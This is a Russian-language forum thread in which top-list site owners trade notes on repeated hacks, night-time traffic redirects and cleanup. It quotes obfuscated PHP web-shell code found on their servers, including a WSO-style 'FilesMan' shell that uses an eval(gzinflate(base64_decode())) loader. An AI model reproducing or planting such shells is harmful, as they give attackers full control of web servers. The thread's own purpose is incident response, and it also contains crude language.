(Лечение!) Ахтунг атакуют топы или дыра GB Top

gimcnuk. Тоже на ум приходит такая мысль, находил я на серваке search.php? есть такой в ГБ, так вот он был поменян на saerch.php. Он был изменен apache. Я его удалил (код там вражеский был) Еще бы знать файлы с каким расширением могут быть потенциально опасными

Ну, поиск (в смысле search.php) в топлистах без особой надобности. Его тоже можно удалить.
Попробуй

Код:

grep -rl 'кусок_от_эксплоита' /path_to_public_html

если установлен бекдор, то ведь логи сервера должны отображать чужие id входы, а нет только мои заходы стоят. Может ходят через мой комп? Аутпост секюрити ничего не перехватывает, троев нет, и не блокирует ничего подозрительного.

Почему чужие? Через дыру влит скрипт, им всё делается. Как раз от имени апача.

ДА сколько же можно уже?! Чтоб у него хуй отсох (С) У меня щас не отображает количество кликов сделаных от трейдеров все пересмотрел нет ничего что криво настроено. На одном топе пошли показатели хз че делать

нет редирект не проявляется сейчас, он проявляется ночью, параметры редиректа прописаны четко у хакера, ip, браузер, режим времени запуска редиректа. Блять как найти бэкдор?

траф-то на спосах сразу проседает, значит редиректит

salo: Я с тобой бро! Что делать БЛЯТЬ!!!!!!!!!!!!!!!!!!!!!!!!! П-А-М-А-Г-И-Т-Е!

Я же написал, грепом пройдитесь. Либо визуально, подозрительные файлы, каких не должно быть

жесть бля какая то творится

парни держитесь !

нашел какие-то подозрительные EXmain, EXmain2, дожны быть только main, main2. удалил

но они не php, а html, смотрим дальше

ну что ребята нашел Web Shell by oRb залит по Ftp, когда блокировка по ip не стояла
/home/имя/domains/domen.com/public_html/transcock/archive/stats/stats.php? От него пошли public_html/stat.php по доменам. Саппорт хоста помог

Все хакерские файлы php

И мне саппорт помог.
Четыре вебшелла вычислили...

Может в ту фарм партнёрку, куда хакер этот болезный там редиректит, заабузить и его акк там прибьют?

Самое интересное я отписывал в тут ПП когда были первые атаки, мне из той партнерки ответили, что вот емейл данного партнера и пишите ему напрямую ))) хотя в сл. атаку надо бы найти, совершенно стороннею машинку и на ней покликать без ативирусника и узнать всего его айди в ПП ;)

Парни у кого хоститесь? мой сапоорт якобы проверил нихера не ннашел походу и не искали. если что скиньте в личку плиз. спасибо за инфу будем искать

CrazyMen: отписал в личку

Друзбя! Нашел я вот что файлы содержались в папке datafiles у всех топо по разному
isp16.php
isp23.php
isp27.php
isp81.php
с кодом

Код: [развернуть]

<?php ${"G\x4cOBAL\x53"}["\x6e\x6d\x63x\x6a\x6bg\x65\x6f\x79\x6fe"]="a\x75th\x5fpass";${${"\x47\x4cO\x42AL\x53"}["\x6e\x6d\x63\x78jk\x67\x65\x6f\x79o\x65"]}="a\x660\x3209\x65\x36\x3102\x35\x31d4\x355\x616\x36\x65feb\x3840\x38\x376\x31\x33";${"G\x4cO\x42\x41\x4c\x53"}["\x6av\x72f\x6b\x6c\x65\x74o"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";${"\x47L\x4fB\x41\x4c\x53"}["\x78yqc\x63\x78x\x68\x78\x6f\x76"]="\x6f\x6bR\x31\x77\x4b\x74\x6fya\x64\x4cX\x36\x44l\x36\x74\x44\x673W\x78\x56\x78\x46\x6f\x48\x68k\x6a6Y\x6e/x\x63='\x29\x29\x29\x3B","\x2e"); ?>

Вес файла примерно 56,8кб

usaagent.php

С кодом

Код: [развернуть]

<?php $auth_pass = "af0209e610251d455a66efeb84087613"; #root $color = "#df5"; $default_action = "FilesMan"; $default_charset = "Windows-1251"; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06PoS+8WeQ70diFHiGW4ECPQj/Yv9kodGeME0UyOcps1tbyevXz6tUX9TIksvuq1s+tmmVc/PdX17VfUNdvEk9P9rRr6ndyon2WHOMK8UfWnGz5cas6G8+69FauVHkafhE3/koI8apAgCADBEYuBo4QqRhLkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>

Вес файла 22,7кб

Так же есть во всех топах в папке datafiles файл jsp.php весом примерно 168байт
с кодом

Код: [развернуть]

<?$a=$_SERVER["HTTP_USER_AGENT"]."aaaaaaaaaa";$jsum=abs(ord($a[0])+ord($a[1])*ord($a[2])+ord($a[3])*ord($a[4])+ord($a[5])-ord($a[6])*ord($a[7])-ord($a[8])*ord($a[9]));?>

Но наверное это стандартный от скрипта.

Ищи у себя все чтонайдете отпишите!

Короче опять... Уже в папке темплейтс фаил _foot.phtml содержимое одинаковое что и у других. Сука я из за него не могу сетку геев поднять блять! Зашел топ проверить а там кликов 0 у всех пиздец приплыли думаю. Проверил так и есть опять то же

Народ, че вы так паритесь со скриптом который ломают через день, грубо говоря. Попробуйте поюзать для топ трейда смартсж, вполне мощный скрипт, много статсов, мультиадминка.
Два -три -5 мастеров отпишите автору в асю что хотите импорт трейдеров с гбтоп, он это спецом для вас сделает, и перенос не составит проблем.

CrazyMen - на топах которые перевел на новый хост??? (появился код?)
Bruno - Попробывал поставить смарт, а там оказывается не так просто залил и через фтп клиент и через браузер установил, там надо через шел и т.д. не так все просто! ;)

Нет. На новый сервер не переезжал. Каким образом он закидывает я не знаю. Но все в одно время закинуты. Имена почти разные файлов.

Дольчик ххх писал:

CrazyMen - на топах которые перевел на новый хост??? (появился код?) Bruno - Попробывал поставить смарт, а там оказывается не так просто залил и через фтп клиент и через браузер установил, там надо через шел и т.д. не так все просто! ;)

Поставить то его как раз и не проблема. Шел - разве проблема счас? Делаешь по мануалу и скрипт ставится. А вот когда поставишь, настраивать его, там море фич, там уже посложнее.